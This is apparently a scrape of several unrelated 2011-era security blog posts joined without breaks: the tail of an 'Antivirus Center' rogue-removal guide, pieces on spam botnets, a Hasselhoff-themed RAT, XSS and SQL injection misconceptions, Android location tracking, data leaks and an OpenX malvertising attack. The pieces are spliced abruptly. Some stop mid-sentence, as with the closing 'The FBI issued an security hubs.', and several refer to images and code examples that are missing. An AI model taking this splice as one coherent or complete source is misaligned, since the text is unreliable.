11. On the Scanner tab, make sure the the Perform full scan option is selected and then click on the Scan button to start scanning your computer for Antivirus Center related files.
    
    
12. MBAM will now start scanning your computer for malware. This process can take quite a while, so we suggest you go and do something else and periodically check on the status of the scan. When MBAM is scanning it will look like the image below.
    
    
    
    
    
13. When the scan is finished a message box will appear as shown in the image below.
    
    
    
    
    You should click on the OK button to close the message box and continue with the Antivirus Center removal process.
    
    
14. You will now be back at the main Scanner screen. At this point you should click on the Show Results button.
    
    
15. A screen displaying all the malware that the program found will be shown as seen in the image below. Please note that the infections found may be different than what is shown in the image.
    
    
    
    
    
    You should now click on the Remove Selected button to remove all the listed malware. MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.
    
    
16. When MBAM has finished removing the malware, it will open the scan log and display it in Notepad. Review the log as desired, and then close the Notepad window.
    
    
17. You can now exit the MBAM program.
    
    
18. As many rogues and other malware are installed through vulnerabilities found in out-dated and insecure programs, it is strongly suggested that you use Secunia PSI to scan for vulnerable programs on your computer. A tutorial on how to use Secunia PSI to scan for vulnerable programs can be found here:
    
    How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector

 

Your computer should now be free of the Antivirus Center program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes’ Anti-Malware to protect against these types of threats in the future.

If you are still having problems with your computer after completing these instructions, then please follow the steps outlined in the topic linked below:

Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help

 

---

 

Associated Antivirus Center Files:

%AllUsersProfile%\Application Data\<random numbers and characters>.dat
%AllUsersProfile%\Application Data\<random numbers and characters>.ico
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Antivirus Center.lnk
%UserProfile%\Desktop\Antivirus Center.lnk
%Temp%\ins2.tmp
%Temp%\mv3.tmp
%Temp%\wrk4.tmp

File Location Notes:

%UserProfile% refers to the current user’s profile folder. By default, this is C:\Documents and Settings\ for Windows 2000/XP, C:\Users\ for Windows Vista/7, and c:\winnt\profiles\ for Windows NT.

%Temp% refers to the Windows Temp folder. By default, this is C:\Windows\Temp for Windows 95/98/ME, C:\DOCUMENTS AND SETTINGS\ProfileName\LOCAL SETTINGS\Temp for Windows 2000/XP, and C:\Users\ProfileName\AppData\Local\Temp for Windows Vista and Windows 7.

%AllUsersProfile% refers to the All Users Profile folder. By default, this is C:\Documents and Settings\All Users for Windows 2000/XP and C:\ProgramData\ for Windows Vista/7.

 

Associated Antivirus Center Windows Registry Information:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “C:\WINDOWS\system32\rundll32.exe” = ‘C:\WINDOWS\system32\rundll32.exe:*:Enabled:Antivirus Center’
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “<random numbers and characters>”

 

Malware distribution via email is far from dead.  While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again

After the bot herders took a brief Easter break, they are back to sending new waves of malicious spam. The first spam campaign was sent by the Cutwail botnet earlier this week. The email claims to be an invoice from Bobijou Inc. – an online jewellery brand. There is a chance that people might fall into this trap especially as it claims money on your credit card was involved. But take a closer look at the subject line: Successfull Order 3677718, that wrong spelling should easily alert you that this email is a scam.

Cutwail Spam Campaign

Another malicious spam campaign originating from the Donbot botnet that came in later this week. It uses a common, uncreative theme with subject line like, “my hot pic : )“, “my naked pic is attached“, etc.  The Donbot botnet’s spam output is on the rise and this is the first time we have seen it spreading malicious attachments.

Dontbot Spam Campaign

Both spam campaigns contain a zipped attachment which, once extracted, contains an executable file that downloads – surprise, surprise – Fake Antivirus:

In addition, this week we have been seeing more of the Asprox botnet’s “Spam from your Facebook account” campaign, that preys on peoples fears about the security of their Facebook accounts. This campaign first came out last year, illustrating that the bot herders behind Asprox often cycle their spam campaigns between UPS, DHL, FEDEX and iTunes Gift Certificate among others.

Recent Facebook spam campaign sent by Asprox

The attachment is a Trojan that aims to seed the Aprox bot executable in the infected host, which is then used for spamming purposes.

SMTP transaction of an Asprox’s process ASPIMGR.EXE

We have blogged about these types of threats many times before.  In a sense, it’s the same old stuff with slightly different social engineering. Be wary.

A while back we noticed that malware authors seem to have a thing for Chuck Norris. And why not: Chuck Norris kicks ass! We have been monitoring the situation carefully and have found several malware that show some sort of interest or tribute towards Mr.Norris.

We started thinking; if our automation can detect malware by looking for references to Chuck Norris, what else can we do? Then it hit us: we need to look for references to David Hasselhoff. Obvious, when you think about it!


Picture (C) F-Secure Corporation

Sure enough – there is malware that references “the Hoff”.

As an example Backdoor:W32/IndSocket.A (a7de748dc32a8edda9e81a201e2a83da8f60bd42) which is a remote administration trojan (RAT) and consists of a client and a backdoor. It allows the attacker to do certain things on a compromised computer; the typical things, such as running programs, logging keystrokes, and changing the wallpaper of user’s Windows desktop. There is a catch, though; the attacker cannot choose which wallpaper to use. When the attacker clicks the “David Hasselhoff Atach” (sic) button on the remote trojan control panel, the wallpaper changes automatically to a well known picture of the “Knight Rider” with two strategically placed puppies.


Picture (C) F-Secure Corporation

So, if you yourself did not change your wallpaper to a picture of “The Hoff”, you know what hit you. We’re sure our customers rest easily knowing our Internet Security includes “Anti-Hassle Hoff Technology(TM)”.

Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), SQL Injection and HTML Injection are security flaws that have been around for years. They are well know vulnerabilities, with well-known solutions. As we’ve seen in recent weeks, even well-established tech companies are not immune to these basic flaws:

• MySQL was compromised by SQL Injection
• WordPress.com was compromised by an HTML Injection/Cross-Site Request Forgery
• Facebook was hit by a worm exploiting an XSS vulnerability
• Barracuda Networks was compromised by SQL Injection
• Twitter had an HTTP Response Splitting flaw

These flaws go by different names, but there cause and consequences are about the same. They are caused by insufficient user input sanitization, and result in malicious code being executed in the browser of the user visiting the site.

I believe one of the reason these flaws are still present in new websites is due to the fact that their exploitation and consequences are not fully understood. Here are few misconceptions I have heard.

XSS is simply about popups

Proof-of-concept for XSS flaws often consists of showing a JavaScript alert popup being displayed. This is just for demonstration purposes. A successful XSS injection can insert any JavaScript into the page, which can, amongst other things:

• steal user credentials (login, password, session, etc.) and other confidential information (credit card number, mailing address, etc.)
• hijack administrator sessions
• force the download of malicious executables
• run other types of code: Flash, Java, ActiveX, etc.

SQL injection is all about reading data

SQL Injection is not only used to dump a database, or to login without valid user credentials. A lot of web applications, like WordPress, store the site content into a database. If an attacker get write access to the database, he can insert malicious code which will then be rendered for all users.

Users are at fault for not being diligent

Another belief is that a user must click on link that contains the XSS, CSRF of HTML infection in order to be affected. Since the “bad” content is often shown in the URL the user clicks on, users should simply be more careful.

First, “bad” links can be hidden with a URL shortener, for example and users may not be aware were they will be redirected. Second, all attacks are not necessarily transient. Malicious content can be inserted by one user, or the attacker, and displayed to all other users via a persistent XSS or HTML Injection flaw. It is the responsibility of the webmaster to protect users. This responsibility should not be placed on each user.


A good blacklist will do the trick

User input filtering is often performed by a blacklist: allow anything, except a few dangerous strings. Unfortunately with HTML and JavaScript, there are too many ways to do the same things. Here are a couple of examples

Conditional comments

HTML comment should be safe, right? Wrong. Internet Explorer actually interprets the content of HTML comments called conditional comments. These 2 lines will make Internet Explorer load and execute JavaScript for evil.com:

These lines are not interpreted as comments by IE

Conditional comments for Internet Explorer also exist for Javascript:

document.write is executed by Internet Explorer

XSS can hide anywhere

A XSS attack does not require the addition of a new script tag on a page. It can hide in a link, tag attributes, CSS, etc.

Examples of harmful JavaScript/HTML insertion

Encoding

Don’t forget about HTML encoding, JavaScript encoding, JavaScript obfuscation, ASCII-7, UTF with null characters, etc.

Some examples of encoding

It’s pretty much impossible to get a comprehensive list of dangerous strings. Instead, a tight whitelist of authorized strings and/or characters should be used first, and only supplemented with a blacklist as needed.

I hope that the high-profile attacks that happened recently will push web developers to pay more attention to the code injection vulnerabilities. Many programming frameworks include libraries and functions to take care of most of these issues. Hopefully they will be used everywhere user input is received and displayed. Don’t ever trust external input!

– Julien

Google has been sued over its Android location tracking practices, days after a similar suit was brought against Apple.

According to The Detroit News, two Michigan women have filled a $50 million class-action suit against the web giant, demanding that the company stop offering Android phones that can track a user’s location.

Google is using Android phones to build a database of cell towers and Wi-Fi networks that can then be tapped by phone applications to pinpoint the location of a given device. The company also makes use of GPS, but in pairing cell tower and WiFi data in tandem with GPS, it can better pinpoint your location – and possibly pinpoint it faster.

At one point, Google was using its fleet of photo-snapping Street View cars to collect cell tower and WiFi information, but after admitting that the cars were also grabbing payload data sent across Wi-Fi networks, the company said it would build the database using Android phones only.

If Android location services are turned on, the OS sends Google a MAC addresses, network signal strength, and GPS coordinates for each Wi-Fi network, as well as a unique identifier for the phone that grabs the information and the time of day, independent security researcher Samy Kamkar tells The Register. Google says that Android location services use an “opt-in” setup and that location data sent back to the company is “anonymized”. But Kamkar has shown that the company does indeed grab a unique identifier for each phone.

By combining the identifier with the location data, Kamkar said, Google could easily determine where you work and where you live. If this location information and unique IDs remain on Google’s servers, it could potentially be extracted via subpoena or national security letter.

Skyhook, the Boston-based company that pioneered this sort of location tracking, does not capture a unique phone ID in the way Google does, according to Skyhook CEO Ted Morgan. And there’s no evidence that Apple’s locations services grab such an identifier either, though Apple has not specifically discussed this. Kamkar tells us that Apple only collects cell tower and WiFi information.

To quickly determine a user’s location, Apple and Skyhook cache a portion of their location databases on phones. “A small localized cache on the device is very helpful for speed,” Morgan tells The Register. “Rather than having to keep going back to the server, you keep a small subset of the reference data locally so that while you are within a 10 block area it just uses the local file until you move farther away…[This is] for speed and for not having to rely on a flakey cellphone network connection.”

Apple says something similar. “The entire crowd-sourced database is too big to store on an iPhone, so we download an appropriate subset (cache) onto each iPhone,” the company explains. “The location data…on the iPhone is not the past or present location of the iPhone, but rather the locations of Wi-Fi hotspots and cell towers surrounding the iPhone’s location.”

Presumably, Google is doing the same thing. Researchers have shown that Google keeps a similar database on Android phones, but this has a limited number of entries.

Skyhook deletes its cache file when the user moves to new location, and later rebuilds it. But Apple’s cache may save data related to places you visited more a year ago or more, according to the company. Apple has said, however, that this is a bug, and that in future versions of iOS, it will only retain data on the iPhone related to your whereabouts within the past seven days or so. “The reason the iPhone stores so much data is a bug we uncovered and plan to fix shortly,” Apple says. “We don’t think the iPhone needs to store more than seven days of this data.”

Apple continues to keep this cache file on the phone even when iPhone location services are turned off, but the company says this too is a bug that will be changed. According to Kamkar, Apple also continues to send cell tower and Wifi data back to its servers when location services are turned off. This is not the case with Google. When Android location services are turned off, Google stops sending data back to its servers.

Last week, independent researchers publicly discussed Apple’s cache file, and this led to a firestorm of media coverage. Then Kamkar discussed his experiences with Google’s location tracking services. Apple was sued on Monday, and now, inevitably, Google has been sued as well.

Yesterday, Apple responded to the firestorm with an FAQ on its website, saying it intends to change the way its cache works. The cache has long been used by law enforcement to determine the past whereabouts of phone owners.

Skyhook once provided location services for the iPhone, and it was slated to provide services for Android. But both Apple and Google decided to handle the technology themselves. Skyhook is suing Google, claiming the web giant strong-armed its Android partners into dropping Skyhook in favor of Google location services.

According to one suit filed by Skyhook, Andy Rubin – the man who oversees Google’s Android project – told Motorola co-CEO Sanjay Jha that if the handset manufacturer didn’t drop Skyhook, Google would remove official Android support from the devices. This would mean that Motorola could not use proprietary Google services such as the Android Market or even the Android name. R

This message may repeat. This message may repeat. For those of us old enough to have fond memories of the phonograph, the phrase “broken record” may come to mind.

Yes, more user information has been leaked and in a totally preventable fashion. A season ticket sales representative for the New York Yankees accidentally emailed a spreadsheet to “several hundred” affiliates with the personal details of over 21,000 Yankees ticket holders.

According to the Yankees, the spreadsheet contained customers’ names, addresses, phone numbers, fax numbers, e-mail addresses and other information like their seat numbers and which ticket packages they purchased.

Implementing data loss prevention (DLP) for sensitive customer data is easy to do. There are at least three ways this could have been prevented…

1. Encrypt the spreadsheet to prevent accidental disclosure
2. Implement endpoint DLP software to watch for the transfer of sensitive data to instant message, email and other communication tools
3. Scan outgoing email messages for personally identifiable information to prevent accidental disclosure.

Later this afternoon DSLReports.com disclosed that they had been the victims of a SQL injection attack that succeeded in stealing usernames and passwords. Justin, the owner of DSLReports, wrote in a forum message that a “sql injection attack by a botnet on wednesday afternoon obtained a large number of email / password pairs.”

Strangely, Justin stated that he had notified account holders who either created their accounts in the last 12 months, or had logged in over the last 12 months. This seems like a terrible practice. Many users have had accounts for more than 10 years and may not even remember having created one.

To not notify everyone who may have been affected seems to be a lapse in judgement, but it gets worse. All of the passwords in DSLReports’ database were in clear text. No hashing, no salting, totally unencrypted.

Once again we find that if we re-use passwords for seemingly unimportant websites, we may be putting our reputations at risk. You can count on the attackers trying to use these email addresses and passwords on as many popular sites as possible.

They may only use them to spread forum spam, but do you really want your name/profile/identity associated with this kind of activity?

Creative Commons image of New York Yankees helmet courtesy of Mr. T in DC’s Flickr photostream.

As we all know, compromised sites play an important role in web distributed malware, acting as the conduit, guiding user traffic to further malicious content. Sometimes, the attackers get lucky, and succeed in compromising a high profile, popular site. Another way to increase the number of users exposed to the attack is to compromise advertising content, thereby exposing all users of any 3rd party sites that happen to load the ads.

Late yesterday evening, we started to see evidence of such an attack – Sophos products were blocking certain ad content as Mal/Iframe-U.

Knowing that detection and what it looked for, I was pretty sure that the ad server of Campus Party was compromised.

Sure enough, I could see that in addition to the desired ads (for the July Campus Party event in Valencia), the content also contained malicious JavaScript (highlighted in yellow):

Not the first time I have seen an OpenX ad-server getting compromised, and I suspect it won’t be the last.

Deobfuscating the JavaScript reveals the payload. As our Mal/Iframe-U detection name suggests, it is an iframe to load further malicious content from a remote server.

This initiates the attack, triggering a chain of events summarised below:

• ad content (pro-actively blocked as Mal/Iframe-U) silently loads content from the attack site.
• user’s browser and browser plug-ins are inspected to determine most appropriate exploit content to load. For this a legitimate library is used.
• exploit content (e.g. Mal/HcpExpl-A, Troj/Lifsect-A, Mal/ExpJS-M) is loaded in order to infect the user with malware. At the time of writing, the exploit site is currently serving up a rootkit which Sophos products detect as Mal/TDSSPack-AX.

As is typically the case for today’s web attacks, all of the script components used are heavily obfuscated in an attempt to thwart detection efforts and hinder analysis.

We have already informed those at Campus Party about this issue in order that they can get the malvertising attack cleaned up as soon as possible. In fact as I type, I can see that the ad server is already offline, presumably whilst they resolve the issue. Kudos to them for actioning this quickly!

As to the root cause of the compromise, I do not know exactly how the server was compromised. However, given history, my money would be on an out of date or unpatched version of OpenX.

In the wake of the press reports concerning the recent data breaches at Sony and Epsilon, some organizations are getting the wrong idea about modern online attacks. The media largely chooses to cover mass-scale losses that affect large numbers of consumers from trusted brands.

While it is important to raise awareness about keeping your data safe online and alerting average internet users that they may be victims of data theft, most users are exposed to risk far more frequently and without their knowledge.

In a story published Tuesday on the Bank Information Security blog, Tracy Kitten detailed the exploits of Rogelio Hackett, Jr., who stole more than 675,000 credit cards. The resulting damages exceeded $36 million.

Hackett’s strategy? Find smaller organizations who have not coded their websites properly, allowing access to their data via SQL injection vulnerabilities. Based upon the reports I see from customers and other researchers, there are likely hundreds, if not thousands, of Hacketts out there systematically looking for low-hanging fruit.

Hackett may be sentenced to 12 years in prison for his crimes, but for every attacker who is caught, another one is ready to fill his shoes.

The FBI issued an security hubs.